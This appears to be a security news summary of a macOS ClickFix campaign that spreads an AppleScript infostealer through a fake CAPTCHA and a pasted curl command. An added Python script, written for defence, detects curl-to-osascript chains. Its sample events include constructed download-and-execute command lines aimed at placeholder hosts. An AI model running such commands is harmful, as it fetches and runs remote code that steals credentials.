AppleScript Infostealer Deployed in New macOS ClickFix Campaign

SC Media, Apr 22, 2026

Why It Matters

The attack exposes a novel vector for credential theft on macOS, threatening both consumer privacy and enterprise security, and underscores the urgency of timely OS updates and stronger user awareness of suspicious prompts.

Key Takeaways

  • AppleScript infostealer targets browsers, extensions, and crypto wallets
  • Malware uses fake CAPTCHA and Spotlight curl command for execution
  • Older macOS versions allow credential harvesting; Tahoe 26.4 blocks it
  • Exfiltrates data from 12 Chromium browsers, Firefox, Waterfox, and 16 wallets
  • Campaign unrelated to APT38’s recent macOS social‑engineering attacks

Pulse Analysis

The emergence of an AppleScript‑based infostealer in the latest ClickFix campaign underscores a shifting threat landscape for macOS users. Apple’s scripting environment has historically been used for legitimate automation, but attackers are now abusing its deep integration with the operating system (the ability to drive applications and read user files with the privileges of the logged‑in user) to avoid the defences that watch for conventional malicious binaries. Because the victim pastes and runs the command themselves, nothing arrives as a quarantined download, so the checks that normally gate untrusted applications never apply. This reflects a broader trend in which threat actors repurpose native macOS tooling to evade detection, raising concerns for both individual users and corporate IT teams.

The payload’s delivery chain is particularly insidious. Victims are directed to a counterfeit CAPTCHA page that fingerprints the visitor’s operating system and then prompts them to paste a curl command into Spotlight, presented as a verification code. Once executed, the command downloads a hidden AppleScript that harvests usernames, session cookies, and a wealth of other data from more than a dozen Chromium‑based browsers, Firefox, Waterfox, and sixteen standalone cryptocurrency wallet applications. By also targeting more than two hundred browser extensions, the malware maximizes its data‑exfiltration surface, which distinguishes it from typical macOS adware and places it alongside sophisticated credential‑stealing operations.

The credential harvesting succeeds only on macOS releases older than Tahoe 26.4, which highlights the security premium of staying current. Enterprises should enforce rapid patch cycles, deploy endpoint detection that flags user‑pasted download‑and‑execute chains (curl output fed straight into osascript or a shell, or osascript running a file that curl has just written), and educate users that no legitimate verification step asks them to paste a command. Limiting the installation of unnecessary browser extensions and using password managers that keep credentials out of browser storage can also reduce the attack’s payoff. As AppleScript remains a double‑edged sword, the industry must balance its automation benefits with tighter sandboxing to curb future macOS‑focused infostealers.
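The following is an added example, not code from the article or from any vendor, of the detection logic the delivery chain above calls for: it looks for a curl download piped directly into an interpreter, and for osascript executing a file that a curl process wrote moments earlier for the same user. The telemetry format (JSON lines with ts, pid, ppid, exe, cmdline, user) and the sample events are constructed assumptions about what an EDR might emit; the hostnames are placeholders.

```python
"""Toy detection rules for a ClickFix-style download-and-execute chain on macOS.

Added example; the event schema is an assumption, and SAMPLE_EVENTS is constructed,
not real telemetry.
"""
import json
import re
from datetime import datetime, timedelta

# Constructed process-start events, one JSON object per line (assumed EDR shape).
SAMPLE_EVENTS = r'''
{"ts":"2026-04-20T09:12:01Z","pid":501,"ppid":310,"exe":"/usr/bin/curl","cmdline":"curl -fsSL https://captcha.example.invalid/verify -o /tmp/.v","user":"alice"}
{"ts":"2026-04-20T09:12:02Z","pid":502,"ppid":310,"exe":"/usr/bin/osascript","cmdline":"osascript /tmp/.v","user":"alice"}
{"ts":"2026-04-20T09:13:30Z","pid":610,"ppid":1,"exe":"/usr/bin/curl","cmdline":"curl -s https://api.example.invalid/health","user":"bob"}
{"ts":"2026-04-20T09:14:00Z","pid":611,"ppid":300,"exe":"/bin/sh","cmdline":"sh -c \"curl -fsSL https://cdn.example.invalid/x.applescript | osascript\"","user":"bob"}
{"ts":"2026-04-20T09:15:00Z","pid":700,"ppid":1,"exe":"/usr/bin/osascript","cmdline":"osascript -e 'display notification \"backup done\"'","user":"bob"}
'''

# Rule 1: curl output piped straight into an interpreter (no file ever touches disk).
DOWNLOAD_EXEC_RE = re.compile(r"\bcurl\b[^|;&]*\|\s*(?:osascript|sh|bash|zsh)\b")
# Where a curl invocation writes its output (-o/--output <path>).
CURL_OUT_RE = re.compile(r"\bcurl\b.*?(?:-o|--output)\s+(\S+)")
# osascript given a script *file* (inline "-e" scripts are excluded on purpose).
OSASCRIPT_FILE_RE = re.compile(r"\bosascript\s+(?!-e\b)(\S+)")
# How long after a curl write an osascript run of that file is still "suspicious".
WINDOW = timedelta(seconds=120)


def parse_events(text):
    """Parse JSON-lines telemetry into a list of dicts, skipping blank lines."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def detect(events):
    """Return [(pid, rule_name), ...] for events matching either rule.

    Events must be in chronological order, as an EDR stream would deliver them.
    """
    alerts = []
    downloads = {}  # (user, output path) -> timestamp of the curl that wrote it
    for ev in events:
        ts = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
        cmd = ev["cmdline"]
        exe = ev["exe"].rsplit("/", 1)[-1]

        if DOWNLOAD_EXEC_RE.search(cmd):
            alerts.append((ev["pid"], "curl_pipe_interpreter"))
            continue

        if exe == "curl":
            # Plain curl is common and benign on its own; just remember the target.
            m = CURL_OUT_RE.search(cmd)
            if m:
                downloads[(ev["user"], m.group(1))] = ts
            continue

        if exe == "osascript":
            # Rule 2: osascript runs a file curl wrote within WINDOW for the same user.
            m = OSASCRIPT_FILE_RE.search(cmd)
            if m:
                key = (ev["user"], m.group(1))
                if key in downloads and ts - downloads[key] <= WINDOW:
                    alerts.append((ev["pid"], "osascript_runs_downloaded_file"))
    return alerts


if __name__ == "__main__":
    for pid, rule in detect(parse_events(SAMPLE_EVENTS)):
        print(f"ALERT pid={pid} rule={rule}")
```

Neither curl nor osascript is suspicious by itself (the health check and the notification script in the sample are left alone); the rules key on the download‑then‑execute sequence, which is what the user is tricked into performing. In production the correlation key would be the quarantine‑free file written by curl plus the session or terminal that launched it, not just the path string.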
